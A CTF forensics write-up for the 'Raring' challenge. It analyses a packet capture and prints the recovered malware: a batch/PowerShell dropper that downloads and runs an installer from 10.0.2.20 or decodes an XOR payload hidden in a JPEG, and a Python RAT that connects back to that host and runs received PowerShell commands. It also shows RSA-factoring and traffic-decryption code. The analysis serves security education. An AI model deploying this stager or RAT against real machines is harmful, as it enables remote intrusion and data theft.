Writeup: Raring
It’s never too late to put out a writeup on a challenge you did… even a whole month after the actual event. This time it is one of the challenges from Undutmaning, a CTF hosted by three Swedish intelligence/security agencies. Just as with my previous writeup, this is a forensics challenge, at least by the CTF organizers’ definition. But it has some reverse engineering and crypto in it as well, which was honestly a really nice design choice on their part. The challenge felt pretty dynamic and I had to pull out some old schoolbook knowledge to solve some of the steps. So without further ado, let’s dive into the material!
First step, looking into the provided material
This challenge starts you off with a pcap file and some allusions that it contains some sort of secret data transmission. Pcap is simply a file format for storing captured network traffic, which can then be sifted through by analysts with tools like Wireshark. Going over the packets flowing back and forth in the pcap file gives the impression of pretty normal web interactions.
Wireshark lets you very easily export the data that was transmitted over a lot of protocols, including the omnipresent HTTP. Looking into the exported files, one pops out very quickly, namely important.rar. Extracting the archive yields a file called IMPORTANT.md.cmd, which seems a pretty poor way of obfuscating an executable, but I think we’ve all seen worse work just fine for attackers. But there are a few other files as well, like a few HTML documents and a cute picture of a cat (which may prove to be more than it looks at first glance). The HTML files seem to indicate that the extracted files came from some sort of interaction with a very simple online mail client. Someone urges the user “Bob” to have a look at and approve the important report, and links the important.rar file.
Looking into the important script
As one may guess from the .cmd file extension, the code within IMPORTANT.md.cmd is a standard old-fashioned batch script. Well, at least syntactically. In reality it is just there to invoke a PowerShell command, because doing heavy lifting logic in batch is a chore and would also likely make the script more cumbersome to ship. I’ve added some whitespace to the original to make it legible:
@echo off
powershell.exe -command '
    if (
        (&{python -V} 2>&1 | % gettype) -eq [System.Management.Automation.ErrorRecord]
    )
    {
        Invoke-WebRequest http://10.0.2.20/msupdate.msi -OutFile C:\Temp\msupdate.msi;
        Start-Process "C:\Temp\msupdate.exe" -WindowStyle Hidden
    }
    else
    {
        $s = (Invoke-WebRequest "http://10.0.2.20/G78GAP3GQV8B.jpg").Content;
        $k = $s[-4934..-2467];
        $v = $s[-2467..-1];
        $o = @();
        for ($i = 0; $i -lt 2467; $i++)
        {
            $o += $k[$i] -bxor $v[$i];
        };
        $o = [System.Text.Encoding]::ASCII.GetString($o);
        python3 -c "print($($o))"
    }
'
First it checks for the presence of a Python interpreter on the system. It does this by asking for the version with the -V flag, but instead of reading the answer it only looks at whether the command returned an error. If it detects that Python isn’t installed, it grabs an installer from an attacker-controlled server and launches it with the -WindowStyle Hidden flag, which hides the installer from the user. However, it seems our user had Python, because otherwise the download would likely be a large chunk of the pcap stream. So we go right to the else branch and the business part of the script, which begins by downloading that cat picture I mentioned earlier right into the variable s. Then the variables k and v are each assigned a sequence of bytes from the end of that image’s data. The bytes in k and v are then bitwise XORed, giving a kind of obfuscation that is similar to encryption in implementation but not in purpose. Whereas encryption aims to maintain the confidentiality of data, this simply makes the payload hard to detect for file scanners, which will think it is just random binary.
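The reason XOR works for this kind of obfuscation is that it is its own inverse: XORing the result with the same key gives back the original bytes. Here is a minimal sketch of that property in Python. The payload and key are made-up values for illustration, not data from the challenge.

```python
import os


def xor_bytes(left: bytes, right: bytes) -> bytes:
    """XOR two equally long byte strings together, byte by byte."""
    if len(left) != len(right):
        raise ValueError("inputs must have the same length")
    return bytes(a ^ b for a, b in zip(left, right))


payload = b"print('hello from the cat')"  # made-up payload
key = os.urandom(len(payload))             # made-up random key of the same length

obfuscated = xor_bytes(payload, key)       # looks like random bytes to a scanner
recovered = xor_bytes(obfuscated, key)     # XOR with the same key undoes it
print(recovered.decode())
```

Shipping the key right next to the payload, as the script does, gives no confidentiality at all, which fits the point that this is obfuscation and not encryption.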
This kind of data transfer is a prime example of steganography, which is the practice of hiding data within data. Doing so in a media file like a JPEG or PNG is often very simple, as you can append data after the end-of-file marker, where an image reader would stop reading the file. In this case, the downloaded G78GAP3GQV8B.jpg is 86491 bytes in size, but the image of the cat is only 81557 of those bytes, which leaves a 4934 byte payload appended to the end of the file. As you can see in the extractor code, that is exactly where the script starts reading bytes from the image, going until the last byte. There are other ways of hiding data in media files as well, of course. One popular and still hard to detect method is Least Significant Bit (LSB) steganography, where you replace the least significant bit of each pixel’s color values with a bit of the data you wish to hide, which leaves the original file size unchanged and is still practically invisible to the human eye. But looking back to our issue at hand, we now understand just what this script is doing, and we can also see that it ends up converting those extracted bytes to ASCII and passing them as a command to Python. So let’s have a look at exactly what they were executing.
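If you want to check for appended data yourself, one way is to walk the JPEG markers until the end-of-image (EOI) marker and see what is left over. The sketch below is a simplified parser written for this writeup, not the tool I used during the CTF. It assumes a single well-formed JPEG at the start of the data, and the function names and the tiny fake image in the demo are made up for illustration.

```python
def find_jpeg_end(data: bytes) -> int:
    """Return the offset just past the EOI marker of the JPEG at the start of data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker, not a JPEG")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:   # fill byte in front of a marker
            pos += 1
            continue
        if marker == 0xD9:   # EOI: the image ends here
            return pos + 2
        if pos + 4 > len(data):
            break
        # Other markers expected here carry a 2-byte big-endian segment length
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == 0xDA:   # SOS: compressed scan data follows the header
            # Skip scan data; FF00 is a stuffed byte and FFD0..FFD7 are restart markers
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def split_trailing_data(data: bytes) -> tuple[bytes, bytes]:
    """Split data into the JPEG itself and whatever was appended after it."""
    end = find_jpeg_end(data)
    return data[:end], data[end:]


# Tiny synthetic stand-in for a real image (not decodable as a picture)
fake_jpeg = (
    b"\xff\xd8"                      # SOI
    b"\xff\xe0\x00\x04ab"            # APP0 segment with a 2-byte body
    b"\xff\xda\x00\x02"              # SOS header with an empty body
    b"\x12\xff\x00\x34\xff\xd0\x56"  # scan data with a stuffed FF00 and an RST0
    b"\xff\xd9"                      # EOI
)
hidden = b"secret \xff\xd9 payload"   # appended data, even containing a fake EOI
image, trailer = split_trailing_data(fake_jpeg + hidden)
print(len(image), len(trailer))
```

Run against the bytes of G78GAP3GQV8B.jpg, the trailer should come out at 4934 bytes if the sizes quoted above are right. Simply searching for the last FF D9 in the file is shorter, but breaks as soon as the appended payload happens to contain those two bytes.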
The cat script
I was too lazy to install PowerShell on my machine, so I quickly rewrote the deobfuscator in Python:
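# Read the whole image, including the payload appended after the JPEG data
with open("G78GAP3GQV8B.jpg", "rb") as f:
    raw_data = f.read()

k = raw_data[-4934:-2467]  # first half of the trailer: the XOR key
# Second half: the XORed payload. PowerShell's -2467..-1 includes the last
# byte, so the Python slice has to run to the end of the data.
v = raw_data[-2467:]

# XOR key and payload byte by byte to recover the Python source
o = bytes(a ^ b for a, b in zip(k, v))
print(o.decode())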
It does the exact same thing as its PowerShell counterpart and when executed prints the code that had been hidden in the cat picture. I have left only the more important code in, because we will be doing very little analysis of the actual code for this part. But I can guarantee that our threat actors ALMOST kept to PEP 8 code standards originally, they even included some error management!
def encrypt_session_key(session_key: bytes) -> bytes:
    # TODO: generate new rsa key, p and q are too close..
    public_pem = '''-----BEGIN PUBLIC KEY-----
MIIB ...
iwIDAQAB
-----END PUBLIC KEY-----'''
    public_key = RSA.import_key(public_pem)
    cipher = PKCS1_OAEP.new(public_key)
    ciphertext = cipher.encrypt(session_key)
    return ciphertext

def encrypt_AES_GCM(key, plaintext):
    ...

def decrypt_AES_GCM(key, nonce, tag, ciphertext):
    ...

if __name__ == '__main__':
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    session_key = get_random_bytes(16)
    while True:
        try:
            sock.connect(('10.0.2.20', 443))
            break
        except:
            sleep(60)
    rsa_blob = encrypt_session_key(session_key)
    sock.sendall(rsa_blob)
    while True:
        message = sock.recv(4096)
        if not message:
            break
        nonce = message[:16]
        tag = message[16:32]
        ciphertext = message[32:]
        command = decrypt_AES_GCM(session_key, nonce, tag, ciphertext).split()
        result = subprocess.check_output(['powershell.exe'] + command, stderr=subprocess.STDOUT)
        aes_blob = encrypt_AES_GCM(session_key, result)
        sock.sendall(aes_blob)
So looking over this code we can see a few things. Firstly, they left a comment in pointing out an obvious flaw, which is not all that uncommon when you break open malware to look inside. Secondly, we are dealing with some very standard hybrid encryption: an embedded RSA public key encrypts a session key, and that symmetric key then protects the stream data. Thirdly, what the script receives and sends are commands and their output respectively, which places this malware in the category of remote access tools, or RATs. It is kind of sneaky at that, because the infected client connects out to a server and then receives its commands, as opposed to the server initiating the connection. This lets an attacker control a victim without the victim’s firewall or NAT settings having to allow inbound connections, and at the same time lets the attacker masquerade as a legitimate HTTPS server to any security systems that are watching.
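The receive loop also tells us how each message is laid out on the wire: 16 bytes of nonce, 16 bytes of tag, then the ciphertext. A small sketch of that framing follows. The function names are my own, and build_frame is only my assumption about what the elided encrypt_AES_GCM returns, based on how the script slices incoming messages.

```python
NONCE_LEN = 16  # bytes, taken from message[:16] in the RAT
TAG_LEN = 16    # bytes, taken from message[16:32] in the RAT


def build_frame(nonce: bytes, tag: bytes, ciphertext: bytes) -> bytes:
    """Assumed sender side: concatenate nonce, tag and ciphertext."""
    if len(nonce) != NONCE_LEN or len(tag) != TAG_LEN:
        raise ValueError("nonce and tag must be 16 bytes each")
    return nonce + tag + ciphertext


def parse_frame(message: bytes) -> tuple[bytes, bytes, bytes]:
    """Receiver side: split a message the same way the RAT does."""
    if len(message) < NONCE_LEN + TAG_LEN:
        raise ValueError("message too short to contain nonce and tag")
    nonce = message[:NONCE_LEN]
    tag = message[NONCE_LEN:NONCE_LEN + TAG_LEN]
    ciphertext = message[NONCE_LEN + TAG_LEN:]
    return nonce, tag, ciphertext


# Placeholder bytes, not real AES-GCM output
frame = build_frame(b"N" * 16, b"T" * 16, b"encrypted command")
print(parse_frame(frame))
```

Note that the RAT treats every recv call as exactly one message. TCP does not guarantee that, but it is good enough for short commands on a quiet connection.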
The final stretch
After having a second look at the pcap file in Wireshark we can identify the exact moment the handshake is made and encrypted SSL traffic starts.
What we have learned thus far is that a victim went on a website, got a download for a cmd file that, when executed, pulled a Python RAT and initiated a connection to a remote server. The connection to that remote server is encrypted with AES, using a key that is in turn encrypted with RSA. The RSA key used is, according to the malware comment, based on poorly selected primes. I’m not going to go into the specifics of how RSA encryption works here, but for our purposes it is important to know that when a key is not constructed according to best practices, the encryption scheme is vulnerable to a lot of cryptographic attacks. In this case we can derive the private key from the public key, because finding the prime factors that make up the modulus is trivial. There is a public database of known factorizations, FactorDB, and this one is included! But without the database, it was pretty quick to just use Fermat factorization as well. Here is the code I used to get the private key:
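from Crypto.PublicKey import RSA
from factordb.factordb import FactorDB

# Load the public key that was embedded in the RAT
key = RSA.import_key(open("id_rsa.pub").read().strip())

# Look up the prime factors of the modulus in FactorDB
f = FactorDB(key.n)
f.connect()
p, q = f.get_factor_list()

# Rebuild the private exponent d from p, q and the public exponent e
phi = (p - 1) * (q - 1)
d = int(pow(key.e, -1, phi))

priv_key = RSA.construct((key.n, key.e, d))
print(priv_key.export_key().decode())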
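For the Fermat route, the idea is that when p and q are close together, n can be written as a² − b² = (a − b)(a + b) with a only slightly larger than √n, so you just try values of a upwards from √n until a² − n is a perfect square. Here is a minimal sketch of that. It is not the exact code I ran during the CTF, and the primes in the demo are toy values, far smaller than the ones in the challenge key.

```python
from math import isqrt


def fermat_factor(n: int, max_steps: int = 1_000_000) -> tuple[int, int]:
    """Factor n = p * q by Fermat's method; fast only when p and q are close."""
    if n % 2 == 0:
        return 2, n // 2
    a = isqrt(n)
    if a * a < n:
        a += 1  # start at the ceiling of sqrt(n)
    for _ in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:  # a^2 - n is a perfect square, so n = (a - b)(a + b)
            return a - b, a + b
        a += 1
    raise ValueError("gave up: p and q are probably not close enough")


# Toy example with two neighbouring primes
n = 10007 * 10009
e = 65537
p, q = fermat_factor(n)
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)  # private exponent, same formula as in the script above

# Sanity check: encrypting and then decrypting returns the original number
message = 42
print(p, q, pow(pow(message, e, n), d, n) == message)
```

With properly generated RSA primes the loop would run for an astronomically long time, which is why the TODO comment in the malware is such a gift.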
Now that we have obtained the private key that is capable of decrypting the session key that was transmitted in the handshake, we can get to work decrypting the entire communication stream! So let’s extract that part from the pcap file. This could be done in Wireshark, but I prefer doing these extractions with tshark, the CLI cousin of Wireshark.
tshark -2 -r raring.pcap -R "ssl" -T fields -e tcp.payload > datafile.txt
What we are essentially saying here is: “Give me the tcp payload of the packets where the connection type is ssl” and then we put it in a file for storage. Then, referencing back to the cat script, we write a decryptor that will use that private key we extracted to get the session key, and then decrypt the traffic:
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.PublicKey import RSA

# priv_key is the RSA key object reconstructed in the previous script

lines = [bytes.fromhex(x.strip()) for x in open("datafile.txt").readlines()]
enc_psk = lines.pop(0)  # Get the encrypted session key which was the first thing transmitted
decryptor = PKCS1_OAEP.new(priv_key)  # Use a decryptor with the reconstructed private key
dec_psk = decryptor.decrypt(enc_psk)  # Get the decrypted session key

def decrypt_AES_GCM(key, nonce, tag, ciphertext):  # Steal the decryption function from the RAT
    cipher = AES.new(key=key, nonce=nonce, mode=AES.MODE_GCM)
    plaintext = cipher.decrypt_and_verify(ciphertext, tag)
    return plaintext.decode('utf-8')

for line in lines:
    nonce = line[:16]
    tag = line[16:32]
    ciphertext = line[32:]
    print(decrypt_AES_GCM(dec_psk, nonce, tag, ciphertext))
And the result (with some whitespace removed, some command outputs abridged, and a > to distinguish commands from output) is:
> hostname
UU24PC01
> whoami /fqdn
CN=Bob Bobsson,CN=Users,DC=sekmyn,DC=local
> Get-NetIPAddress
IPAddress : fe80::e1cb:257e:e4a8:f121%8
InterfaceIndex : 8
InterfaceAlias : Ethernet
...
> Get-NetNeighbor
ifIndex IPAddress LinkLayerAddress State PolicyStore
------- --------- ---------------- ----- -----------
8 ff02::1:ffa8:f121 33-33-FF-A8-F1-21 Permanent ActiveStore
...
> Net User
User accounts for \\UU24PC01
-----------------------------------------------------------
Administrator Bob DefaultAccount
Guest WDAGUtilityAccount
The command completed successfully.
> Get-PSDrive
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
Alias Alias
C 24.65 24.48 FileSystem C:\ Users\bob.SEKMYN
...
> Get-ChildItem Z:\
Directory: Z:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
...
d----- 3/10/2024 6:15 PM admin
> Get-ChildItem Z:\admin\
Directory: Z:\admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
----- 3/10/2024 6:15 PM 28 flag.txt
> Get-Content Z:\admin\flag.txt
undut{Qu4nd0-Qu4nd0-Qu4nd0}
And there is our flag! You can tell by the sequence of commands that they wanted to give the impression of an attacker doing some cautious recon before finding what they were looking for. They make sure they are on the right machine, list the network, then go for the filesystem. This kind of command execution is common in attacks where the attacker either has not done a lot of recon beforehand, and thus is unfamiliar with the system they land on, or has a broader scope for their attack and so couldn’t know the victim system layout in advance. While far from conclusive evidence of compromise in and of itself, it can serve as a light indicator to be combined with others to detect attackers before things escalate too far.
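To make the "light indicator" idea a bit more concrete, here is a rough sketch of how one could score a command history for this kind of recon pattern. Everything in it is an assumption for illustration: the list of commands is just what showed up in this session, the threshold is arbitrary, and a real detection rule would need far more context than this.

```python
# Hypothetical watch list, taken from the commands seen in this capture
RECON_COMMANDS = {
    "hostname",
    "whoami",
    "get-netipaddress",
    "get-netneighbor",
    "net user",
    "get-psdrive",
}


def recon_hits(commands: list[str]) -> set[str]:
    """Return which watch-listed commands appear in the given history."""
    hits = set()
    for command in commands:
        normalized = " ".join(command.lower().split())
        for known in RECON_COMMANDS:
            if normalized == known or normalized.startswith(known + " "):
                hits.add(known)
    return hits


def looks_like_recon(commands: list[str], threshold: int = 4) -> bool:
    """Flag a history that touches many different recon commands (arbitrary threshold)."""
    return len(recon_hits(commands)) >= threshold


session = [
    "hostname",
    "whoami /fqdn",
    "Get-NetIPAddress",
    "Get-NetNeighbor",
    "Net User",
    "Get-PSDrive",
    "Get-ChildItem Z:\\",
]
print(looks_like_recon(session))
```

Any single one of these commands is something an administrator runs every day, which is exactly why the score only means something in combination with other signals.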
Conclusion
Generally, it is hard to find and stop scripts like this before it is too late. They run commands, use protocols, and make connections that could just as well be completely benign. This is exactly why a lot of browsers will be really persistent about you trusting the source of a download. While this attack doesn’t try to do fancier things like privilege escalation and completely owning the victim device, it can still be used to hijack user resources and exfiltrate user data. This particular one was meant to be connected to by a person, but in most cases RATs are operated through some sort of command and control server that keeps the connection alive and orchestrates the infected machines. While this SSL-lookalike connection mechanism will work fine for most machines in most networks, other command and control mechanisms can be used to look even more innocent. One such example is using a Discord bot with a webhook to control the infected machine via a Discord server. To the victim machine, and to any intrusion detection systems, the traffic will look like normal Discord use and will be practically impossible for automated systems to spot as malicious. In this case the malicious file was sent by a supposedly trusted colleague over mail, but it could just as well have been a Discord friend who had their account hijacked or a text message from someone who had their number spoofed.